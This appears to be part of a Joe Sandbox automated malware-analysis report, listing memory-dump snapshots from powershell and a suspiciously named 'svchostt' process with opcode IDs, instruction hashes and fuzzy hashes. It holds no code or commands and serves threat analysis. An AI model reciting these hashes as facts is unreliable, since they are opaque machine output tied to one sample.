                                                                            • Instruction ID: 83084f25c1df349313695307995325ab341fed8466cd87c62c1536be81221cee
                                                                            • Opcode Fuzzy Hash: 9db00539c41671b27e9a6bb9c9f382e45a8d8cfda554226f3c7bf6abf1c77347
                                                                            • Instruction Fuzzy Hash: 82D13672B0FACE4FEB659B6888645A57BA0EF9A314B0903FFD45CC70E3D918A905C341
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 938623fa0f3298688d6040b7a6af3c3fdfc020ef359b730f8611a385f2d40af9
                                                                            • Instruction ID: 1acf00a210d5042773d7b59168e5a77d243f2057804569afd744306b14a45fa0
                                                                            • Opcode Fuzzy Hash: 938623fa0f3298688d6040b7a6af3c3fdfc020ef359b730f8611a385f2d40af9
                                                                            • Instruction Fuzzy Hash: 2751EA22B0EA8A0FE7F69B68586457037D2DFE9350B0A03BBD44DC71A3DD19AD058341
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b6955288b672aec61cecba7570507ba9abf92efbe7b036b6e416fd263eadece3
                                                                            • Instruction ID: 72bb90e65c01599f81f1cae15edd07fa0bb660a13c4e68e19c4139949777cfc7
                                                                            • Opcode Fuzzy Hash: b6955288b672aec61cecba7570507ba9abf92efbe7b036b6e416fd263eadece3
                                                                            • Instruction Fuzzy Hash: BB414B37E0F69E5FFB21AB9CD8B64E43B60FF55769B0902B3C0D88A063ED1425868641
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 141b7de150663dbba2739ae016fea36092eb665d700d9c060f7d2c32f4d2942b
                                                                            • Instruction ID: 8a5b0e648a948fe02b7fafd6a36badb6e52c9663a9fd8cb15e617fb6668ecb0d
                                                                            • Opcode Fuzzy Hash: 141b7de150663dbba2739ae016fea36092eb665d700d9c060f7d2c32f4d2942b
                                                                            • Instruction Fuzzy Hash: 41410E72A0DB488FDB589F5C985A6F97BE0FF99310F40416FE489C3292DA20B945C7C2
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2160783095.00007FFD9B6ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6ED000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b6ed000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 4271d8014f99846e08cd0c1ec04a4e228c0c4d78010a17c84f964ab0258478df
                                                                            • Instruction ID: 5419693bda1c3834d8ff9e13721e49f08ddda7e03ff35606d67504f473bc4bb3
                                                                            • Opcode Fuzzy Hash: 4271d8014f99846e08cd0c1ec04a4e228c0c4d78010a17c84f964ab0258478df
                                                                            • Instruction Fuzzy Hash: 2C41267150EBC84FE7A68B2898559623FF0EF52220F1605DFD0D9CB1A3D625B806C792
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8cca5e1bfcd223ab8bafb25098b2f170689bf6c543d74815a5310366e5bf2a61
                                                                            • Instruction ID: f615067ac0e34bc0f5e5ed0b370680db236d6137dda962a4e7bfb23ecd44f1b2
                                                                            • Opcode Fuzzy Hash: 8cca5e1bfcd223ab8bafb25098b2f170689bf6c543d74815a5310366e5bf2a61
                                                                            • Instruction Fuzzy Hash: F3213C3190CB4C4FDB59DFAC984A7E97BF0EF9A321F04426BD048C3152DA74941ACB91
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 839376d279a2eeb710a260c876ee20f650038d5711cda006171492c3c64dbd81
                                                                            • Instruction ID: 51287e08e1661a3360a38f69b6e8da8b9e3696eb676e3d03550c55c3a626026b
                                                                            • Opcode Fuzzy Hash: 839376d279a2eeb710a260c876ee20f650038d5711cda006171492c3c64dbd81
                                                                            • Instruction Fuzzy Hash: 5A018F3250E7864FE3168B68A8A24A07FB0DF4327070942EBD0C5CA4A3D526588BC751
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction ID: 2b13d53e025c2be8e90647bd55e6abaa926a26a99d8691448afac0a98a8ed019
                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction Fuzzy Hash: A001A73021CB0D4FD748EF0CE051AA6B3E0FF89360F10056DE58AC36A1DA32E882CB41
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 161abeb6e3318ad57e9fa0f034802e77b72030f9712c5fc4a78445656120bd06
                                                                            • Instruction ID: 852e09b503f7cafe576d46e44c4e482d4542c2c19ec0f5c61b0c88c15c5152cd
                                                                            • Opcode Fuzzy Hash: 161abeb6e3318ad57e9fa0f034802e77b72030f9712c5fc4a78445656120bd06
                                                                            • Instruction Fuzzy Hash: 29F03032B0D5494FDB69EB5CE45189473E0EF5932071501BBE15DC75B7DA25EC418740
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2711cc547a0f3e10ed74aaffe8697aa356eb16ea2ccd0c34e6521d5f753acce4
                                                                            • Instruction ID: aeb6ad275be88915c621c30cb5cfb75d02bacb4ce1c6fa72bcce76823db70a3e
                                                                            • Opcode Fuzzy Hash: 2711cc547a0f3e10ed74aaffe8697aa356eb16ea2ccd0c34e6521d5f753acce4
                                                                            • Instruction Fuzzy Hash: 81F0BE32B0E5498FDB64EB4CE0648A873E0FF4932070601BBE05DCB0A3DA25BC80C790
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2163040306.00007FFD9B8D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b8d0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction ID: 7088ed3d6d6b9d5ea87a478394cc45f134a04600c237e2e00915a735f27c0c4b
                                                                            • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                            • Instruction Fuzzy Hash: 07E01A31B0C8089FDB78DB4CE0519A973E1EB98331B1602BBD14EC7571CA22ED518B80
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.2161897459.00007FFD9B800000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B800000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_9_2_7ffd9b800000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: K_^4$K_^7$K_^F$K_^J
                                                                            • API String ID: 0-377281160
                                                                            • Opcode ID: 3a0129d9073d28574ef41f57c119285f9db9755330e4a3708e73f9ebeeba15b4
                                                                            • Instruction ID: 9d309066f7feec984ecd3bd4730bca1830a416a0825308ca437a89f333535588
                                                                            • Opcode Fuzzy Hash: 3a0129d9073d28574ef41f57c119285f9db9755330e4a3708e73f9ebeeba15b4
                                                                            • Instruction Fuzzy Hash: AE21297BB085655ED705BB7CB8189DD3BA0CF9827935642F3D0A9CB093ED14708786C0
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2396657061.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b8b0000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: dfe9b7a75cbedc424ca73b3a7ba1ddd417b909be922a90054d383cb3ff4ede1e
                                                                            • Instruction ID: 8386e5516645520e8a135acbac1c2c1581b82f174f07d35684b0865b82d6cb82
                                                                            • Opcode Fuzzy Hash: dfe9b7a75cbedc424ca73b3a7ba1ddd417b909be922a90054d383cb3ff4ede1e
                                                                            • Instruction Fuzzy Hash: 2ED147B2B0FA9E4FEB659B7848655B5BBA0EF1A314B0901FED45CC70E3D918E8058781
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2395303544.00007FFD9B7E9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E9000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b7e9000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: df5c198132bf24696efd70c3cff9f324dce98eb1093af38034f82ab60e0ae55d
                                                                            • Instruction ID: b1002db72875d9208dc26909f2d9f97168576de115fafe91383eb26f8b9da87d
                                                                            • Opcode Fuzzy Hash: df5c198132bf24696efd70c3cff9f324dce98eb1093af38034f82ab60e0ae55d
                                                                            • Instruction Fuzzy Hash: 5151393060D7894FD71ADF68C8E58A47BE0EF56318B1502BED49AC71B7EE29A843C711
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2395303544.00007FFD9B7E9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E9000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b7e9000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: d3c943c562dc4cabc1a027a9492af53e5756c470701f53093f2e72dfe67e59cf
                                                                            • Instruction ID: 640760a90d2578d9ebae420f5be9276173afc34e531d1d7709dc602bafaff978
                                                                            • Opcode Fuzzy Hash: d3c943c562dc4cabc1a027a9492af53e5756c470701f53093f2e72dfe67e59cf
                                                                            • Instruction Fuzzy Hash: CB41297290DB884FDB189F5C9C1A6B9BBE0FB55310F04426FE059D32A2DA70A915CBC2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2393745331.00007FFD9B6CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6CD000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b6cd000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 010610cc57cd783e7c727d9d0842f66475d3e2008eb597a036e40730ffd0fca9
                                                                            • Instruction ID: 655726aac6137cff37d7764e2cc214f034e1e123573d9d51548f43a6cf84f40d
                                                                            • Opcode Fuzzy Hash: 010610cc57cd783e7c727d9d0842f66475d3e2008eb597a036e40730ffd0fca9
                                                                            • Instruction Fuzzy Hash: 0241F77150EBC44FD766AB3898559623FF0EF56220B1606DFE088CB1A3D625B846C7A2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.2395303544.00007FFD9B7E9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E9000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_7ffd9b7e9000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9e587cc9506b3c7faa411733a7a13766530da8dec27346b67a8ab0df7f2017c4
                                                                            • Instruction ID: 398a935b57e99574ef394409143f082f3cd3dc44c15ef12b93cb2a3196637716
                                                                            • Opcode Fuzzy Hash: 9e587cc9506b3c7faa411733a7a13766530da8dec27346b67a8ab0df7f2017c4
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 800f3b72ef4277b7b845c4338d77a57c8e624836e273015604af16c25a5a0678
                                                                            • Instruction ID: 99d218b0eb3c34985a9a7eb5bef15e3e49c0a4aa5543457649a7a2b04c246645
                                                                            • Opcode Fuzzy Hash: 800f3b72ef4277b7b845c4338d77a57c8e624836e273015604af16c25a5a0678
                                                                            • Instruction Fuzzy Hash: D8310072F09A4E4ED750AB68D8B55ED7BB1FFC4250F4A02BAC04DE61B6DD242909C350
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ed9e6764b8fc74e71852ea7a2092b2a94f99037e90a10b0055126ece93d7e409
                                                                            • Instruction ID: db21983ff38c6ed4da386fde5f964e091b535a93fd90825206952669fc7a3d60
                                                                            • Opcode Fuzzy Hash: ed9e6764b8fc74e71852ea7a2092b2a94f99037e90a10b0055126ece93d7e409
                                                                            • Instruction Fuzzy Hash: 1E31D072E09A4E4FD750AB68D8B55EDBBB1EFC5240F8602BAC04DE71F6DD2429098350
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8087a8d007f0f20aeec79f13c658800e3a516d6c9480288e00cdf2e629403575
                                                                            • Instruction ID: 902af06af849e9a9032dd17d40738a5ad064803d65a9ab42333ad8913262d1ef
                                                                            • Opcode Fuzzy Hash: 8087a8d007f0f20aeec79f13c658800e3a516d6c9480288e00cdf2e629403575
                                                                            • Instruction Fuzzy Hash: 5B51E536F0861A8BDB04FBACA465AEC33B1FFD432AB15467AD009C72D6CE246445C790
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 0bb7dcc1e27aa572d4d1e5a56145fe34b7c035deb0965450f0a3b412b9ef549b
                                                                            • Instruction ID: 87076d3acc9ed790eea896252351fc066a08ddd2020f520e3c5895e24c9ce6b3
                                                                            • Opcode Fuzzy Hash: 0bb7dcc1e27aa572d4d1e5a56145fe34b7c035deb0965450f0a3b412b9ef549b
                                                                            • Instruction Fuzzy Hash: 9B411036B08A1E8FDB44FB6CD861AEC73A1FFC4311B45467AD009C7296CE34A84AC780
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 558e025687bf6614864de53a9bd02f4df5fb0e5a8ff6ab3ee4e2fc63548934e1
                                                                            • Instruction ID: 300cbf0ee4b6b58d8dd3712041d5a949813b93e750ee20c97c6bb338b205c5ee
                                                                            • Opcode Fuzzy Hash: 558e025687bf6614864de53a9bd02f4df5fb0e5a8ff6ab3ee4e2fc63548934e1
                                                                            • Instruction Fuzzy Hash: E431D121B1C94D0FE798EF6C9869679B2C2EFD8355F0546BEA05EC32E7DD24AC428341
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                                                            • Instruction ID: 418a9ea806e1ccd207bb67409d9f687dd55e107c71b91ac69553623695c52f89
                                                                            • Opcode Fuzzy Hash: 25e7aa873ef6c579796df89d9b1a151490d9dcc7044717d658527890250281db
                                                                            • Instruction Fuzzy Hash: 87218415F1490A4BFB84BBBC546E7BC72D2EFD8715F504276E41DC32DADD28A8418392
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8663974db51a767834c702e707c10f5130f27934a34752d0c0a588452369aa53
                                                                            • Instruction ID: 26d2ed1c255a5ea5967386a7341a1f93882bcc7a463aa3e31f4c99df83c3114d
                                                                            • Opcode Fuzzy Hash: 8663974db51a767834c702e707c10f5130f27934a34752d0c0a588452369aa53
                                                                            • Instruction Fuzzy Hash: AF217E34758A4D4BC345EB6CE4A69FDBBA1BFC8200B8649ACE408C73AECE2859058751
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2587822188.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2c88ef00f56f55f08cc7067d2c1f5fbdeb7fc49e09e1e840959e457bafd26e1b
                                                                            • Instruction ID: b49bc745d51a2d925789d07fb012106a9df6acc9eada1541bfb9af69526c6958
                                                                            • Opcode Fuzzy Hash: 2c88ef00f56f55f08cc7067d2c1f5fbdeb7fc49e09e1e840959e457bafd26e1b
                                                                            • Instruction Fuzzy Hash: 89014C14E0D7890FE35166785C754317FE0DFD1251B0A07BBF888C60F7D8086B498392
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a8299cc959fd2e7285e98e23ce157690ff38f76ed8c0216a6d73a51495a860b5
                                                                            • Instruction ID: 83557b9dc0011f7de4248cf4f6a1e8fb2be7d93c141d51718a5e23a226b5f5f4
                                                                            • Opcode Fuzzy Hash: a8299cc959fd2e7285e98e23ce157690ff38f76ed8c0216a6d73a51495a860b5
                                                                            • Instruction Fuzzy Hash: 4932C760B19A4D4FE798EB688479ABDB7D2FFD8340F450679E04DC32E6DE28B9018741
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f115f5c7800d6ffce1aa3e7ee4e12fda4fd11bf0c03fe2cd359c7348ff6ab425
                                                                            • Instruction ID: 18c665c9a166ddae5611fb1d80c9a447cad1aa0d605be4b2443e888ef90b0e1e
                                                                            • Opcode Fuzzy Hash: f115f5c7800d6ffce1aa3e7ee4e12fda4fd11bf0c03fe2cd359c7348ff6ab425
                                                                            • Instruction Fuzzy Hash: 4A711616F0D6DA0EE356B67C64695E93BA1DFC622971981FBD0CDCA0E7CC0828878352
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 1493ed410216478db4d0a888a69ce9de91f60f11b4084e2f8f481990d3e2c809
                                                                            • Instruction ID: a3af8741c98b832f905549cc79910be93bdbfa28b8c31f5ed96e1f45d3f47005
                                                                            • Opcode Fuzzy Hash: 1493ed410216478db4d0a888a69ce9de91f60f11b4084e2f8f481990d3e2c809
                                                                            • Instruction Fuzzy Hash: E9510010B1E6C94FD796ABB848746657FE5DF87219B0806FBE09DC61E7DD18180AC342
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ;O_$<O_^
                                                                            • API String ID: 0-3431308889
                                                                            • Opcode ID: dfbfe2b9ea25a28e4dc3654a2b4222ee09f61aae90937a66752d2584ffea2117
                                                                            • Instruction ID: 77398470a9d721d2532b4ddd592ec787a8ff45e2718839290279166b3783893b
                                                                            • Opcode Fuzzy Hash: dfbfe2b9ea25a28e4dc3654a2b4222ee09f61aae90937a66752d2584ffea2117
                                                                            • Instruction Fuzzy Hash: A341F776B096494BD304FBA8A0B9DEA7B62FFC4314F5145FAD018CB3DBCD2868468B44
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: eddaf5faa8c6f2aaacf8547e97600543b0d3382ecc44546f640253951304bf45
                                                                            • Instruction ID: 3284ece85c97b9fcd757cfd842dc9dab2e24fe25a0a752038fd71b661531d697
                                                                            • Opcode Fuzzy Hash: eddaf5faa8c6f2aaacf8547e97600543b0d3382ecc44546f640253951304bf45
                                                                            • Instruction Fuzzy Hash: FD31FF72F09A4E4ED750AB6898795ED7BB2FFC4250F4602BAC14DE61B3DD28280A8350
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 88ce127b7c86c5b3827d00f9e5b8e15760c4f25f51b7a2cb9b280d644123fbf2
                                                                            • Instruction ID: 68fff379a44b1bc91da603b0c645e8bea75569dafbcedfb617cf9f2a1ac6227d
                                                                            • Opcode Fuzzy Hash: 88ce127b7c86c5b3827d00f9e5b8e15760c4f25f51b7a2cb9b280d644123fbf2
                                                                            • Instruction Fuzzy Hash: BA310072F09A4E4ED750AB68D8795ED7BB2FFC4250F4602BAC14DE61B2DD282909C350
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e73f35c903c71174c9ce63cad5d3516ee51af0b0edb777877362174e8f6b0804
                                                                            • Instruction ID: ba45f121128ec492aaa4920e23ac290a4ff85dca173d6d5e775d5fff4dccd6da
                                                                            • Opcode Fuzzy Hash: e73f35c903c71174c9ce63cad5d3516ee51af0b0edb777877362174e8f6b0804
                                                                            • Instruction Fuzzy Hash: 4C31CF72E09A4E4ED750AB6898795EDBBB2FFC5240F4602BAC04DE71F6DD2829098350
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e74308cdd9114b192514fb63a19e4efe2c1cd967a54830ebdc510f6127be336b
                                                                            • Instruction ID: 6d595a698b6ee23547998f5b3c94ec972e95054a9a53402ee7d024acdedcbecd
                                                                            • Opcode Fuzzy Hash: e74308cdd9114b192514fb63a19e4efe2c1cd967a54830ebdc510f6127be336b
                                                                            • Instruction Fuzzy Hash: 6D51D636F0961A8BDB04FBACA465AEC73B1FFC432AF11467AD109C72D6CE246446C790
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.2669833734.00007FFD9B7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7D0000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_18_2_7ffd9b7d0000_svchostt.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 42bf3f9cffa2b4eb042d0e8a7553e533a6a28f50b55d28e661d5246d40f05119
                                                                            • Instruction ID: 7c23115b06db2fd5165c42edb88edd6cf752ce69c82f679ad82629ff441756e5
                                                                            • Opcode Fuzzy Hash: 42bf3f9cffa2b4eb042d0e8a7553e533a6a28f50b55d28e661d5246d40f05119
                                                                            • Instruction Fuzzy Hash: 9E41D236B04A1E9FDB44FBA8D865AED73A2FFC4315F50467AD009C7296CE34A846C790
                                                                            Memory Dump Source
